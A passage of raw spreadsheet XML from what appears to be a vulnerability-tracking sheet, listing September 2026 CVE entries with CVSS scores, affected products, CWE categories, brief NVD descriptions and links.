This issue affects Bifrost GPU Kernel Driver: from r12p0 through r49p5, from r50p0 through r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r19p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0.</t></is></c><c r="T710" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9040</t></is></c></row><row r="711"><c r="A711" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B711" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C711" s="5" t="inlineStr"><is><t>CVE-2026-77110</t></is></c><c r="D711" s="5" t="n"><v>7.6</v></c><c r="E711" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F711" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G711" s="5" t="inlineStr" /><c r="H711" s="5" t="n"><v>0.007</v></c><c r="I711" s="5" t="inlineStr" /><c r="J711" s="5" t="inlineStr" /><c r="K711" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L711" s="5" t="inlineStr" /><c r="M711" s="5" t="inlineStr" /><c r="N711" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O711" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P711" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q711" s="5" t="inlineStr" /><c r="R711" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S711" s="5" t="inlineStr"><is><t>Adobe Commerce is affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in a Security feature bypass. An attacker with high privileges could leverage this vulnerability to access unauthorized files or directories outside the intended restrictions, causing a limited disruption to availability. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T711" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77110</t></is></c></row><row r="712"><c r="A712" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B712" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C712" s="5" t="inlineStr"><is><t>CVE-2026-82053</t></is></c><c r="D712" s="5" t="n"><v>7.6</v></c><c r="E712" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F712" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G712" s="5" t="inlineStr" /><c r="H712" s="5" t="n"><v>0.002</v></c><c r="I712" s="5" t="inlineStr" /><c r="J712" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K712" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L712" s="5" t="inlineStr" /><c r="M712" s="5" t="inlineStr" /><c r="N712" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O712" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P712" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q712" s="5" t="inlineStr" /><c r="R712" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S712" s="5" t="inlineStr"><is><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is></c><c r="T712" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82053</t></is></c></row><row r="713"><c r="A713" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B713" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C713" s="5" t="inlineStr"><is><t>CVE-2026-86073</t></is></c><c r="D713" s="5" t="n"><v>7.6</v></c><c r="E713" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F713" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G713" s="5" t="inlineStr" /><c r="H713" s="5" t="n"><v>0.002</v></c><c r="I713" s="5" t="inlineStr" /><c r="J713" s="5" t="inlineStr" /><c r="K713" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L713" s="5" t="inlineStr" /><c r="M713" s="5" t="inlineStr" /><c r="N713" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O713" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P713" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q713" s="5" t="inlineStr" /><c r="R713" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S713" s="5" t="inlineStr"><is><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is></c><c r="T713" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86073</t></is></c></row><row r="714"><c r="A714" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B714" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C714" s="5" t="inlineStr"><is><t>CVE-2026-0860</t></is></c><c r="D714" s="5" t="n"><v>7.5</v></c><c r="E714" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F714" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G714" s="5" t="inlineStr" /><c r="H714" s="5" t="n"><v>0.002</v></c><c r="I714" s="5" t="inlineStr" /><c r="J714" s="5" t="inlineStr" /><c r="K714" s="5" t="inlineStr" /><c r="L714" s="5" t="inlineStr" /><c r="M714" s="5" t="inlineStr" /><c r="N714" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O714" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P714" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q714" s="5" t="inlineStr" /><c r="R714" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="S714" s="5" t="inlineStr"><is><t>Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU memory processing operations to gain access to sensitive kernel information.



This issue affects Valhall GPU Kernel Driver: from r29p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0.</t></is></c><c r="T714" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0860</t></is></c></row><row r="715"><c r="A715" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B715" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C715" s="5" t="inlineStr"><is><t>CVE-2026-16025</t></is></c><c r="D715" s="5" t="n"><v>7.5</v></c><c r="E715" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F715" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G715" s="5" t="inlineStr" /><c r="H715" s="5" t="n"><v>0.003</v></c><c r="I715" s="5" t="inlineStr" /><c r="J715" s="5" t="inlineStr" /><c r="K715" s="5" t="inlineStr" /><c r="L715" s="5" t="inlineStr" /><c r="M715" s="5" t="inlineStr" /><c r="N715" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O715" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P715" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q715" s="5" t="inlineStr" /><c r="R715" s="5" t="inlineStr"><is><t>CWE-1284</t></is></c><c r="S715" s="5" t="inlineStr"><is><t>Improper validation of specified quantity in input vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Input Data Manipulation.

This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t></is></c><c r="T715" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16025</t></is></c></row><row r="716"><c r="A716" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B716" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C716" s="5" t="inlineStr"><is><t>CVE-2026-16037</t></is></c><c r="D716" s="5" t="n"><v>7.5</v></c><c r="E716" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F716" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G716" s="5" t="inlineStr" /><c r="H716" s="5" t="n"><v>0.003</v></c><c r="I716" s="5" t="inlineStr" /><c r="J716" s="5" t="inlineStr" /><c r="K716" s="5" t="inlineStr" /><c r="L716" s="5" t="inlineStr" /><c r="M716" s="5" t="inlineStr" /><c r="N716" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O716" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P716" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q716" s="5" t="inlineStr" /><c r="R716" s="5" t="inlineStr"><is><t>CWE-208</t></is></c><c r="S716" s="5" t="inlineStr"><is><t>Observable timing discrepancy vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Black Box Reverse Engineering.

This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t></is></c><c r="T716" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16037</t></is></c></row><row r="717"><c r="A717" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B717" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C717" s="5" t="inlineStr"><is><t>CVE-2026-16497</t></is></c><c r="D717" s="5" t="n"><v>7.5</v></c><c r="E717" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F717" s="5" t="inlineStr"><is><t>psirt@nvidia.com</t></is></c><c r="G717" s="5" t="inlineStr" /><c r="H717" s="5" t="n"><v>0.004</v></c><c r="I717" s="5" t="inlineStr" /><c r="J717" s="5" t="inlineStr" /><c r="K717" s="5" t="inlineStr" /><c r="L717" s="5" t="inlineStr" /><c r="M717" s="5" t="inlineStr" /><c r="N717" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O717" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P717" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q717" s="5" t="inlineStr" /><c r="R717" s="5" t="inlineStr"><is><t>CWE-834</t></is></c><c r="S717" s="5" t="inlineStr"><is><t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could cause excessive iteration. A successful exploit of this vulnerability might lead to denial of service.</t></is></c><c r="T717" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16497</t></is></c></row><row r="718"><c r="A718" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B718" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C718" s="5" t="inlineStr"><is><t>CVE-2026-28604</t></is></c><c r="D718" s="5" t="n"><v>7.5</v></c><c r="E718" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F718" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G718" s="5" t="inlineStr" /><c r="H718" s="5" t="n"><v>0.002</v></c><c r="I718" s="5" t="inlineStr" /><c r="J718" s="5" t="inlineStr" /><c r="K718" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L718" s="5" t="inlineStr" /><c r="M718" s="5" t="inlineStr" /><c r="N718" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O718" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P718" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q718" s="5" t="inlineStr" /><c r="R718" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S718" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible use after free due to a race condition. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T718" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28604</t></is></c></row><row r="719"><c r="A719" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B719" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C719" s="5" t="inlineStr"><is><t>CVE-2026-3174</t></is></c><c r="D719" s="5" t="n"><v>7.5</v></c><c r="E719" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F719" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G719" s="5" t="inlineStr" /><c r="H719" s="5" t="n"><v>0.003</v></c><c r="I719" s="5" t="inlineStr" /><c r="J719" s="5" t="inlineStr" /><c r="K719" s="5" t="inlineStr" /><c r="L719" s="5" t="inlineStr" /><c r="M719" s="5" t="inlineStr" /><c r="N719" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O719" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P719" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q719" s="5" t="inlineStr" /><c r="R719" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S719" s="5" t="inlineStr"><is><t>The Event Tickets and Registration plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the Stripe OAuth return endpoint in all versions up to, and including, 5.27.4. This makes it possible for unauthenticated attackers to overwrite the site's Stripe merchant credentials (access tokens, publishable keys, and account ID), diverting all subsequent payment processing to the attacker's Stripe account.</t></is></c><c r="T719" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-3174</t></is></c></row><row r="720"><c r="A720" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B720" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C720" s="5" t="inlineStr"><is><t>CVE-2026-47625</t></is></c><c r="D720" s="5" t="n"><v>7.5</v></c><c r="E720" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F720" s="5" t="inlineStr"><is><t>psirt@nvidia.com</t></is></c><c r="G720" s="5" t="inlineStr" /><c r="H720" s="5" t="n"><v>0.004</v></c><c r="I720" s="5" t="inlineStr" /><c r="J720" s="5" t="inlineStr" /><c r="K720" s="5" t="inlineStr" /><c r="L720" s="5" t="inlineStr" /><c r="M720" s="5" t="inlineStr" /><c r="N720" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O720" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P720" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q720" s="5" t="inlineStr" /><c r="R720" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S720" s="5" t="inlineStr"><is><t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could abuse missing authorization. A successful exploit of this vulnerability might lead to information disclosure, data tampering, and denial of service.</t></is></c><c r="T720" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-47625</t></is></c></row><row r="721"><c r="A721" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B721" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C721" s="5" t="inlineStr"><is><t>CVE-2026-48888</t></is></c><c r="D721" s="5" t="n"><v>7.5</v></c><c r="E721" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F721" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G721" s="5" t="inlineStr" /><c r="H721" s="5" t="n"><v>0.003</v></c><c r="I721" s="5" t="inlineStr" /><c r="J721" s="5" t="inlineStr" /><c r="K721" s="5" t="inlineStr" /><c r="L721" s="5" t="inlineStr" /><c r="M721" s="5" t="inlineStr" /><c r="N721" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O721" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P721" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q721" s="5" t="inlineStr" /><c r="R721" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S721" s="5" t="inlineStr"><is><t>Allocation of Resources Without Limits or Throttling vulnerability in Automattic WooCommerce allows HTTP DoS.

This issue affects WooCommerce: from n/a before 11.1.0.</t></is></c><c r="T721" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-48888</t></is></c></row><row r="722"><c r="A722" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B722" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C722" s="5" t="inlineStr"><is><t>CVE-2026-57098</t></is></c><c r="D722" s="5" t="n"><v>7.5</v></c><c r="E722" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F722" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G722" s="5" t="inlineStr" /><c r="H722" s="5" t="n"><v>0.006</v></c><c r="I722" s="5" t="inlineStr" /><c r="J722" s="5" t="inlineStr" /><c r="K722" s="5" t="inlineStr"><is><t>microsoft:remote_desktop_client</t></is></c><c r="L722" s="5" t="inlineStr" /><c r="M722" s="5" t="inlineStr" /><c r="N722" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O722" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P722" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q722" s="5" t="inlineStr" /><c r="R722" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S722" s="5" t="inlineStr"><is><t>Improper verification of cryptographic signature in Windows RDP Client allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T722" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-57098</t></is></c></row><row r="723"><c r="A723" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B723" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C723" s="5" t="inlineStr"><is><t>CVE-2026-57099</t></is></c><c r="D723" s="5" t="n"><v>7.5</v></c><c r="E723" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F723" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G723" s="5" t="inlineStr" /><c r="H723" s="5" t="n"><v>0.008</v></c><c r="I723" s="5" t="inlineStr" /><c r="J723" s="5" t="inlineStr" /><c r="K723" s="5" t="inlineStr" /><c r="L723" s="5" t="inlineStr" /><c r="M723" s="5" t="inlineStr" /><c r="N723" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O723" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P723" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q723" s="5" t="inlineStr" /><c r="R723" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S723" s="5" t="inlineStr"><is><t>Allocation of resources without limits or throttling in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T723" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-57099</t></is></c></row><row r="724"><c r="A724" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B724" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C724" s="5" t="inlineStr"><is><t>CVE-2026-62759</t></is></c><c r="D724" s="5" t="n"><v>7.5</v></c><c r="E724" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F724" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G724" s="5" t="inlineStr" /><c r="H724" s="5" t="n"><v>0.003</v></c><c r="I724" s="5" t="inlineStr" /><c r="J724" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K72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24" s="5" t="inlineStr" /><c r="M724" s="5" t="inlineStr" /><c r="N724" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O724" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P724" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q724" s="5" t="inlineStr" /><c r="R724" s="5" t="inlineStr"><is><t>CWE-290</t></is></c><c r="S724" s="5" t="inlineStr"><is><t>Authentication bypass by spoofing in Windows Netlogon allows an unauthorized attacker to perform spoofing over an adjacent network.</t></is></c><c r="T724" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62759</t></is></c></row><row r="725"><c r="A725" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B725" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C725" s="5" t="inlineStr"><is><t>CVE-2026-62813</t></is></c><c r="D725" s="5" t="n"><v>7.5</v></c><c r="E725" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F725" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G725" s="5" t="inlineStr" /><c r="H725" s="5" t="n"><v>0.006</v></c><c r="I725" s="5" t="inlineStr" /><c r="J725" s="5" t="inlineStr" /><c r="K725" s="5" t="inlineStr" /><c r="L725" s="5" t="inlineStr" /><c r="M725" s="5" t="inlineStr" /><c r="N725" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O725" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P725" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q725" s="5" t="inlineStr" /><c r="R725" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S725" s="5" t="inlineStr"><is><t>Use after free in Active Directory Domain Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T725" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62813</t></is></c></row><row r="726"><c r="A726" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B726" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C726" s="5" t="inlineStr"><is><t>CVE-2026-66304</t></is></c><c r="D726" s="5" t="n"><v>7.5</v></c><c r="E726" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F726" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G726" s="5" t="inlineStr" /><c r="H726" s="5" t="n"><v>0.007</v></c><c r="I726" s="5" t="inlineStr" /><c r="J726" s="5" t="inlineStr" /><c r="K726" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L726" s="5" t="inlineStr" /><c r="M726" s="5" t="inlineStr" /><c r="N726" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O726" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P726" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q726" s="5" t="inlineStr" /><c r="R726" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S726" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Skype for Business allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T726" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66304</t></is></c></row><row r="727"><c r="A727" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B727" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C727" s="5" t="inlineStr"><is><t>CVE-2026-66307</t></is></c><c r="D727" s="5" t="n"><v>7.5</v></c><c r="E727" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F727" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G727" s="5" t="inlineStr" /><c r="H727" s="5" t="n"><v>0.006</v></c><c r="I727" s="5" t="inlineStr" /><c r="J727" s="5" t="inlineStr" /><c r="K727" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L727" s="5" t="inlineStr" /><c r="M727" s="5" t="inlineStr" /><c r="N727" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O727" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P727" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q727" s="5" t="inlineStr" /><c r="R727" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S727" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Skype for Business allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T727" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66307</t></is></c></row><row r="728"><c r="A728" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B728" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C728" s="5" t="inlineStr"><is><t>CVE-2026-67376</t></is></c><c r="D728" s="5" t="n"><v>7.5</v></c><c r="E728" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F728" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G728" s="5" t="inlineStr" /><c r="H728" s="5" t="n"><v>0.008</v></c><c r="I728" s="5" t="inlineStr" /><c r="J728" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K728" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L728" s="5" t="inlineStr" /><c r="M728" s="5" t="inlineStr" /><c r="N728" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O728" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P728" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q728" s="5" t="inlineStr" /><c r="R728" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S728" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T728" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67376</t></is></c></row><row r="729"><c r="A729" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B729" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C729" s="5" t="inlineStr"><is><t>CVE-2026-68887</t></is></c><c r="D729" s="5" t="n"><v>7.5</v></c><c r="E729" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F729" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G729" s="5" t="inlineStr" /><c r="H729" s="5" t="n"><v>0.008</v></c><c r="I729" s="5" t="inlineStr" /><c r="J729" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K72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29" s="5" t="inlineStr" /><c r="M729" s="5" t="inlineStr" /><c r="N729" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O729" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P729" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q729" s="5" t="inlineStr" /><c r="R729" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S729" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Message Queuing Queue Manager allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T729" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68887</t></is></c></row><row r="730"><c r="A730" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B730" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C730" s="5" t="inlineStr"><is><t>CVE-2026-69329</t></is></c><c r="D730" s="5" t="n"><v>7.5</v></c><c r="E730" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F730" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G730" s="5" t="inlineStr" /><c r="H730" s="5" t="n"><v>0.011</v></c><c r="I730" s="5" t="inlineStr" /><c r="J730" s="5" t="inlineStr" /><c r="K730" s="5" t="inlineStr" /><c r="L730" s="5" t="inlineStr" /><c r="M730" s="5" t="inlineStr" /><c r="N730" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O730" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P730" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q730" s="5" t="inlineStr" /><c r="R730" s="5" t="inlineStr"><is><t>CWE-125, CWE-190</t></is></c><c r="S730" s="5" t="inlineStr"><is><t>Out-of-bounds read in BranchCache allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T730" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69329</t></is></c></row><row r="731"><c r="A731" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B731" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C731" s="5" t="inlineStr"><is><t>CVE-2026-69342</t></is></c><c r="D731" s="5" t="n"><v>7.5</v></c><c r="E731" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F731" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G731" s="5" t="inlineStr" /><c r="H731" s="5" t="n"><v>0.011</v></c><c r="I731" s="5" t="inlineStr" /><c r="J731" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K731" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L731" s="5" t="inlineStr" /><c r="M731" s="5" t="inlineStr" /><c r="N731" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O731" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P731" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q731" s="5" t="inlineStr" /><c r="R731" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S731" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T731" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69342</t></is></c></row><row r="732"><c r="A732" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B732" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C732" s="5" t="inlineStr"><is><t>CVE-2026-69378</t></is></c><c r="D732" s="5" t="n"><v>7.5</v></c><c r="E732" s="5" 